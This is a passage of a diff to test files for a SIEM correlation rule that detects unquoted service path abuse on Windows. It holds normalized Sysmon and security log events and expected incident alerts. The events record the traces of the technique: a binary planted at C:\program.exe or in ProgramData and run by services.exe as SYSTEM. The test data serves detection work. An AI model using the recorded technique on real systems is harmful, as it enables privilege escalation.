"task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:01.724Z", "type": "raw", "uuid": "638719b5-ca45-4a59-bc6e-19e3509127fe"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:00.3084796Z\"},\"EventRecordID\":\"27322\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2752\",\"ThreadID\":\"3576\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:00.127\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b754-5ea4-0000-00104f0a2500}\"},{\"Name\":\"ProcessId\",\"text\":\"6244\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\LogonUI.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Logon User Interface Host\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"logonui.exe\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"LogonUI.exe\\\" /flags:0x4 /state0:0xa38bd055 /state1:0x41c64e6d\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-3384-5ea5-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=E1AB36E5C3C1453C592E2901330EB13C5D29B351,MD5=33F89DD9629CB0422A2C17268376232D,SHA256=9358EF8CB7FB08581D74274005263BD8FA2E6E0FC443930B25FD345CF6CE9071,IMPHASH=B9B0B64B08B38276711093CA94348D39\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{00000000-0000-0000-0000-000000000000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"572\"},{\"Name\":\"ParentImage\",\"text\":\"?\"},{\"Name\":\"ParentCommandLine\",\"text\":\"?\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-3384-5ea5-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "\"LogonUI.exe\" /flags:0x4 /state0:0xa38bd055 /state1:0x41c64e6d", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\logonui.exe", "object.process.guid": "747f3d96-b754-5ea4-0000-00104f0a2500", "object.process.hash.imphash": "B9B0B64B08B38276711093CA94348D39", "object.process.hash.md5": "33F89DD9629CB0422A2C17268376232D", "object.process.hash.sha1": "E1AB36E5C3C1453C592E2901330EB13C5D29B351", "object.process.hash.sha256": "9358EF8CB7FB08581D74274005263BD8FA2E6E0FC443930B25FD345CF6CE9071", "object.process.id": "6244", "object.process.meta": "Description:Windows Logon User Interface Host | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "logonui.exe", "object.process.original_name": "logonui.exe", "object.process.parent.cmdline": "?", "object.process.parent.fullpath": "?", "object.process.parent.guid": "00000000-0000-0000-0000-000000000000", "object.process.parent.id": "572", "object.process.parent.name": "?", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.505Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:00.127Z", "type": "raw", "uuid": "8a10bf4b-66ab-4d06-bb20-2cfbffa251a2"} +{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"11\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"11\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:18:47.1434753Z\"},\"EventRecordID\":\"27292\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2752\",\"ThreadID\":\"3576\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"PrivEsc - Potential PrivEsc via unquoted Service\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:18:47.120\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b521-5ea4-0000-00108c171300}\"},{\"Name\":\"ProcessId\",\"text\":\"5712\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\system32\\\\cmd.exe\"},{\"Name\":\"TargetFilename\",\"text\":\"C:\\\\program.exe\"},{\"Name\":\"CreationUtcTime\",\"text\":\"2020-04-25 22:18:47.120\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "PrivEsc - Potential PrivEsc via unquoted Service", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": "c:\\program.exe", "object.name": "program.exe", "object.path": "c:\\", "object.property": "creation time", "object.value": "2020-04-25T22:18:47.120Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.505Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\cmd.exe", "subject.process.guid": "747f3d96-b521-5ea4-0000-00108c171300", "subject.process.id": "5712", "subject.process.name": "cmd.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:18:47.120Z", "type": "raw", "uuid": "f0cf1415-5921-4e9e-a365-bf3ece70afa2"} # Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь -expect 1 { "_rule": "Unquoted_Service_Path_Abuse", "correlation_name": "Unquoted_Service_Path_Abuse", "alert.key": "c:\\program.exe|c:\\program files\\vulnsvc\\mmm.exe"} \ No newline at end of file +expect 1 {"action": "start", "alert.key": "c:\\program.exe|c:\\program files\\vulnsvc\\mmm.exe", "category.generic": "Attack", "category.high": "Privilege Escalation", "category.low": "Hijack Execution Flow: Path Interception by Unquoted Path", "correlation_name": "Unquoted_Service_Path_Abuse", "correlation_type": "incident", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "PrivEsc - Potential Unquoted Service Exploit", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "Unquoted_Service_Path_Abuse|c:\\program.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.session_id": "999", "object.process.cmdline": "c:\\Program Files\\vulnsvc\\mmm.exe", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\program.exe", "object.process.guid": "747f3d96-b766-5ea4-0000-0010e7880100", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "2856", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "program.exe", "object.process.original_name": "Cmd.Exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\", "object.process.version": "10.0.17763.592 (WinBuild.160101.0800)", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999"} \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Unquoted_Service_Path_Abuse/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Unquoted_Service_Path_Abuse/tests/test_2.sc index 4066b852..61706d6b 100644 --- a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Unquoted_Service_Path_Abuse/tests/test_2.sc +++ b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Unquoted_Service_Path_Abuse/tests/test_2.sc @@ -1,6 +1,4 @@ -# Здесь укажи какие нормализованные события (одно или несколько) ты подаёшь на вход правилу корреляции. -# События отделяются друг от друга символом новой строки. Каждое их них должно быть записано в строку. -{"_checkpoint": 60837360029, "_meta": {"id": "ecb0611a-0604-01ee-9454-005056825a53", "time": "2023-06-08T14:01:08.9920000Z", "assetIds": ["1864e292-4880-0001-0000-000000000007"], "site_alias": "unknown site_id=null", "site_name": "unknown site_id=null", "site_address": "unknown site_id=null", "site_is_deleted": true}, "action": "start", "asset_ids": ["1864e292-4880-0001-0000-000000000007"], "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4688\",\"Version\":\"2\",\"Level\":\"0\",\"Task\":\"13312\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-08T14:01:08.992902900Z\"},\"EventRecordID\":\"50080921\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"292\"},\"Channel\":\"Security\",\"Computer\":\"wks05.example.com\",\"Security\":null},\"EventData\":{\"Data\":[{\"text\":\"S-1-5-18\",\"Name\":\"SubjectUserSid\"},{\"text\":\"WKS05$\",\"Name\":\"SubjectUserName\"},{\"text\":\"CYBERDYNE\",\"Name\":\"SubjectDomainName\"},{\"text\":\"0x3e7\",\"Name\":\"SubjectLogonId\"},{\"text\":\"0x138c\",\"Name\":\"NewProcessId\"},{\"text\":\"C:\\\\ProgramData\\\\simple.exe\",\"Name\":\"NewProcessName\"},{\"text\":\"%%1936\",\"Name\":\"TokenElevationType\"},{\"text\":\"0x288\",\"Name\":\"ProcessId\"},{\"text\":\"C:\\\\ProgramData\\\\Simple Service\\\\SimpleService.exe\",\"Name\":\"CommandLine\"},{\"text\":\"S-1-0-0\",\"Name\":\"TargetUserSid\"},{\"text\":\"-\",\"Name\":\"TargetUserName\"},{\"text\":\"-\",\"Name\":\"TargetDomainName\"},{\"text\":\"0x0\",\"Name\":\"TargetLogonId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\",\"Name\":\"ParentProcessName\"},{\"text\":\"S-1-16-16384\",\"Name\":\"MandatoryLabel\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield1": "999", "datafield19": "simple.exe (5004) (file creator: cmd.exe (4916) ← explorer.exe (4244) ← userinit.exe (4228) ← winlogon.exe (632) ← smss.exe (524) ← smss.exe (324)) ← services.exe (648) ← wininit.exe (532) ← smss.exe (420) ← smss.exe (324) ← system (4)", "datafield2": "648", "datafield3": "c:\\windows\\system32\\", "datafield4": "services.exe", "datafield5": "C:\\ProgramData\\Simple Service\\SimpleService.exe", "datafield7": "0", "event_src.asset": "1864e292-4880-0001-0000-000000000007", "event_src.category": "Operating system", "event_src.fqdn": "wks05.example.com", "event_src.host": "wks05.example.com", "event_src.hostname": "wks05", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2916", "historical": false, "id": "PT_Microsoft_Windows_eventlog_4688_A_new_process_has_been_created", "importance": "info", "incorrect_time": false, "input_id": "00000000-0000-0000-0000-000000000000", "job_id": "692db8c2-9d54-11eb-a8b3-0242ac130003", "mime": "application/x-pt-eventlog", "msgid": "4688", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "S-1-5-18", "object.account.name": "system", "object.account.provider": "local", "object.account.session_id": "999", "object.id": "5004", "object.name": "simple.exe", "object.path": "c:\\programdata\\", "object.process.chain": "simple.exe (file creator: cmd.exe ← explorer.exe ← userinit.exe ← winlogon.exe ← smss.exe ← smss.exe) ← services.exe ← wininit.exe ← smss.exe ← smss.exe ← system", "object.process.cmdline": "C:\\ProgramData\\Simple Service\\SimpleService.exe", "object.process.fullpath": "c:\\programdata\\simple.exe", "object.process.id": "5004", "object.process.name": "simple.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.id": "648", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\programdata\\", "object.type": "elevated", "origin_app_alias": "MP-1", "origin_app_id": "185957ea-0f40-0001-0000-000000000002", "primary_siem_app_alias": "MP-1", "primary_siem_app_id": "185957ea-0f40-0001-0000-000000000002", "recv_asset": "1864e292-4880-0001-0000-000000000007", "recv_host": "wks05", "recv_ipv4": "2.3.4.5", "remote": false, "scope_id": "00000000-0000-0000-0000-000000000005", "siem_alias": "1.2.3.4", "siem_id": "e944c6fa-4174-4bb7-afae-98b42faee6b2", "site_address": "unknown site_id=null", "site_alias": "unknown site_id=null", "site_name": "unknown site_id=null", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "S-1-5-18", "subject.account.name": "system", "subject.account.privileges": "TokenElevationTypeDefault", "subject.account.session_id": "999", "subject.domain": "cyberdyne", "subject.id": "S-1-5-18", "subject.name": "wks05$", "subject.privileges": "%%1936", "subject.state": "on behalf of oneself", "tag": "wineventlog", "tenant_id": "00000000-0000-0000-0000-000000000000", "time": "2023-06-08T14:01:08.9920000Z", "uuid": "ecb0611a-0604-01ee-9454-005056825a53"} +{"action": "start", "body": "{ \"Event\": { \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\", \"System\": { \"Provider\": { \"Name\": \"Microsoft-Windows-Security-Auditing\", \"Guid\": \"{54849625-5478-4994-a5ba-3e3b0328c30d}\" }, \"EventID\": \"4688\", \"Version\": \"2\", \"Level\": \"0\", \"Task\": \"13312\", \"Opcode\": \"0\", \"Keywords\": \"0x8020000000000000\", \"TimeCreated\": { \"SystemTime\": \"2023-06-08T14:37:10.335665700Z\" }, \"EventRecordID\": \"50082171\", \"Correlation\": null, \"Execution\": { \"ProcessID\": \"4\", \"ThreadID\": \"2684\" }, \"Channel\": \"Security\", \"Computer\": \"wks05.example.com\", \"Security\": null }, \"EventData\": { \"Data\": [ { \"text\": \"S-1-5-18\", \"Name\": \"SubjectUserSid\" }, { \"text\": \"WKS05$\", \"Name\": \"SubjectUserName\" }, { \"text\": \"CYBERDYNE\", \"Name\": \"SubjectDomainName\" }, { \"text\": \"0x3e7\", \"Name\": \"SubjectLogonId\" }, { \"text\": \"0x1648\", \"Name\": \"NewProcessId\" }, { \"text\": \"C:\\\\ProgramData\\\\Simple Service\\\\simple.exe\", \"Name\": \"NewProcessName\" }, { \"text\": \"%%1936\", \"Name\": \"TokenElevationType\" }, { \"text\": \"0x288\", \"Name\": \"ProcessId\" }, { \"text\": \"\\\"C:\\\\ProgramData\\\\Simple Service\\\\Simple\\\" Service.exe\", \"Name\": \"CommandLine\" }, { \"text\": \"S-1-0-0\", \"Name\": \"TargetUserSid\" }, { \"text\": \"-\", \"Name\": \"TargetUserName\" }, { \"text\": \"-\", \"Name\": \"TargetDomainName\" }, { \"text\": \"0x0\", \"Name\": \"TargetLogonId\" }, { \"text\": \"C:\\\\Windows\\\\System32\\\\services.exe\", \"Name\": \"ParentProcessName\" }, { \"text\": \"S-1-16-16384\", \"Name\": \"MandatoryLabel\" } ] } } }", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "event_src.category": "Operating system", "event_src.fqdn": "wks05.example.com", "event_src.host": "wks05.example.com", "event_src.hostname": "wks05", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4688_A_new_process_has_been_created", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4688", "normalized": true, "object": "process", "object.account.domain": "cyberdyne", "object.account.id": "S-1-5-18", "object.account.name": "wks05$", "object.account.session_id": "999", "object.process.cmdline": "\"C:\\ProgramData\\Simple Service\\Simple\" Service.exe", "object.process.fullpath": "c:\\programdata\\simple service\\simple.exe", "object.process.id": "5704", "object.process.name": "simple.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.id": "648", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\programdata\\simple service\\", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-09T08:36:02.469Z", "status": "success", "subject": "account", "subject.account.domain": "cyberdyne", "subject.account.id": "S-1-5-18", "subject.account.name": "wks05$", "subject.account.privileges": "TokenElevationTypeDefault", "subject.account.session_id": "999", "subject.state": "on behalf of oneself", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-08T14:37:10.335Z", "type": "raw", "uuid": "d4a01206-bc5a-4dd4-824b-0cb47d1a2fbf"} # Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь -expect 1 {"alert.key": "c:\\programdata\\simple.exe|c:\\programdata\\simple service\\simpleservice.exe", "correlation_name": "Unquoted_Service_Path_Abuse"} \ No newline at end of file +expect 1 {"action": "start", "alert.key": "c:\\programdata\\simple service\\simple.exe|\"c:\\programdata\\simple service\\simple\" service.exe", "category.generic": "Attack", "category.high": "Privilege Escalation", "category.low": "Hijack Execution Flow: Path Interception by Unquoted Path", "correlation_name": "Unquoted_Service_Path_Abuse", "correlation_type": "incident", "event_src.fqdn": "wks05.example.com", "event_src.host": "wks05.example.com", "event_src.hostname": "wks05", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "Unquoted_Service_Path_Abuse|c:\\programdata\\simple service\\simple.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "process", "object.account.domain": "cyberdyne", "object.account.id": "S-1-5-18", "object.account.name": "wks05$", "object.account.session_id": "999", "object.process.cmdline": "\"C:\\ProgramData\\Simple Service\\Simple\" Service.exe", "object.process.fullpath": "c:\\programdata\\simple service\\simple.exe", "object.process.id": "5704", "object.process.name": "simple.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.id": "648", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\programdata\\simple service\\", "status": "success", "subject": "account", "subject.account.domain": "cyberdyne", "subject.account.id": "S-1-5-18", "subject.account.name": "wks05$", "subject.account.privileges": "TokenElevationTypeDefault", "subject.account.session_id": "999"} \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Unquoted_Service_Path_Abuse/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Unquoted_Service_Path_Abuse/tests/test_3.sc index 49e00215..002c29c4 100644 --- a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Unquoted_Service_Path_Abuse/tests/test_3.sc +++ b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Unquoted_Service_Path_Abuse/tests/test_3.sc @@ -1,4 +1,3 @@ -{"_checkpoint": 60843328089, "_meta": {"id": "041a90cf-0606-01ee-9454-005056825a53", "time": "2023-06-08T14:08:57.6580000Z", "assetIds": ["1864e292-4880-0001-0000-000000000007"], "site_alias": "unknown site_id=null", "site_name": "unknown site_id=null", "site_address": "unknown site_id=null", "site_is_deleted": true}, "action": "start", "asset_ids": ["1864e292-4880-0001-0000-000000000007"], "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-08T14:08:57.662941300Z\"},\"EventRecordID\":\"833155\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2336\",\"ThreadID\":\"3744\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"wks05.example.com\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"text\":\"-\",\"Name\":\"RuleName\"},{\"text\":\"2023-06-08 14:08:57.658\",\"Name\":\"UtcTime\"},{\"text\":\"{20fff121-e0f9-6481-3701-000000003b00}\",\"Name\":\"ProcessGuid\"},{\"text\":\"4556\",\"Name\":\"ProcessId\"},{\"text\":\"C:\\\\ProgramData\\\\Simple Service\\\\simple.exe\",\"Name\":\"Image\"},{\"text\":\"10.0.17763.1697 (WinBuild.160101.0800)\",\"Name\":\"FileVersion\"},{\"text\":\"Windows Command Processor\",\"Name\":\"Description\"},{\"text\":\"Microsoft® Windows® Operating System\",\"Name\":\"Product\"},{\"text\":\"Microsoft Corporation\",\"Name\":\"Company\"},{\"text\":\"Cmd.Exe\",\"Name\":\"OriginalFileName\"},{\"text\":\"\\\"C:\\\\ProgramData\\\\Simple Service\\\\Simple\\\" Service.exe\",\"Name\":\"CommandLine\"},{\"text\":\"C:\\\\Windows\\\\system32\\\\\",\"Name\":\"CurrentDirectory\"},{\"text\":\"NT AUTHORITY\\\\SYSTEM\",\"Name\":\"User\"},{\"text\":\"{20fff121-dbde-6481-e703-000000000000}\",\"Name\":\"LogonGuid\"},{\"text\":\"0x3e7\",\"Name\":\"LogonId\"},{\"text\":\"0\",\"Name\":\"TerminalSessionId\"},{\"text\":\"System\",\"Name\":\"IntegrityLevel\"},{\"text\":\"MD5=911D039E71583A07320B32BDE22F8E22,SHA256=BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527,IMPHASH=272245E2988E1E430500B852C4FB5E18\",\"Name\":\"Hashes\"},{\"text\":\"{20fff121-dbdd-6481-0b00-000000003b00}\",\"Name\":\"ParentProcessGuid\"},{\"text\":\"648\",\"Name\":\"ParentProcessId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\",\"Name\":\"ParentImage\"},{\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\",\"Name\":\"ParentCommandLine\"},{\"text\":\"NT AUTHORITY\\\\SYSTEM\",\"Name\":\"ParentUser\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield1": "999", "datafield10": "Cmd.Exe", "datafield19": "simple.exe (4556) (file creator: cmd.exe (4916) ← explorer.exe (4244) ← userinit.exe (4228) ← winlogon.exe (632) ← smss.exe (524) ← smss.exe (324)) ← services.exe (648) ← wininit.exe (532) ← smss.exe (420) ← smss.exe (324) ← system (4)", "datafield2": "648", "datafield3": "c:\\windows\\system32\\", "datafield4": "services.exe", "datafield5": "\"C:\\ProgramData\\Simple Service\\Simple\" Service.exe", "datafield6": "20fff121-dbde-6481-e703-000000000000", "datafield7": "999", "datafield8": "20fff121-e0f9-6481-3701-000000003b00", "datafield9": "C:\\Windows\\system32\\services.exe", "event_src.asset": "1864e292-4880-0001-0000-000000000007", "event_src.category": "Other", "event_src.fqdn": "wks05.example.com", "event_src.host": "wks05.example.com", "event_src.hostname": "wks05", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2916", "historical": false, "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "incorrect_time": false, "input_id": "00000000-0000-0000-0000-000000000000", "job_id": "692db8c2-9d54-11eb-a8b3-0242ac130003", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "S-1-5-18", "object.account.name": "system", "object.account.privileges": "System", "object.account.provider": "local", "object.account.session_id": "999", "object.hash": "BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527", "object.id": "4556", "object.name": "simple.exe", "object.path": "c:\\programdata\\simple service\\", "object.process.chain": "simple.exe (file creator: cmd.exe ← explorer.exe ← userinit.exe ← winlogon.exe ← smss.exe ← smss.exe) ← services.exe ← wininit.exe ← smss.exe ← smss.exe ← system", "object.process.cmdline": "\"C:\\ProgramData\\Simple Service\\Simple\" Service.exe", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\programdata\\simple service\\simple.exe", "object.process.guid": "20fff121-e0f9-6481-3701-000000003b00", "object.process.hash": "IMPHASH:272245E2988E1E430500B852C4FB5E18 MD5:911D039E71583A07320B32BDE22F8E22 SHA256:BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "911D039E71583A07320B32BDE22F8E22", "object.process.hash.sha256": "BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527", "object.process.id": "4556", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "simple.exe", "object.process.original_name": "Cmd.Exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "20fff121-dbdd-6481-0b00-000000003b00", "object.process.parent.id": "648", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\programdata\\simple service\\", "object.process.version": "10.0.17763.1697 (WinBuild.160101.0800)", "object.property": "metadata", "object.value": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.version": "10.0.17763.1697 (WinBuild.160101.0800)", "origin_app_alias": "MP-1", "origin_app_id": "185957ea-0f40-0001-0000-000000000002", "primary_siem_app_alias": "MP-1", "primary_siem_app_id": "185957ea-0f40-0001-0000-000000000002", "recv_asset": "1864e292-4880-0001-0000-000000000007", "recv_host": "wks05", "recv_ipv4": "2.3.4.5", "remote": false, "scope_id": "00000000-0000-0000-0000-000000000005", "siem_alias": "1.2.3.4", "siem_id": "e944c6fa-4174-4bb7-afae-98b42faee6b2", "site_address": "unknown site_id=null", "site_alias": "unknown site_id=null", "site_name": "unknown site_id=null", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "S-1-5-18", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "subject.domain": "nt authority", "subject.name": "system", "subject.state": "on behalf of oneself", "tag": "wineventlog", "tenant_id": "00000000-0000-0000-0000-000000000000", "time": "2023-06-08T14:08:57.6580000Z", "uuid": 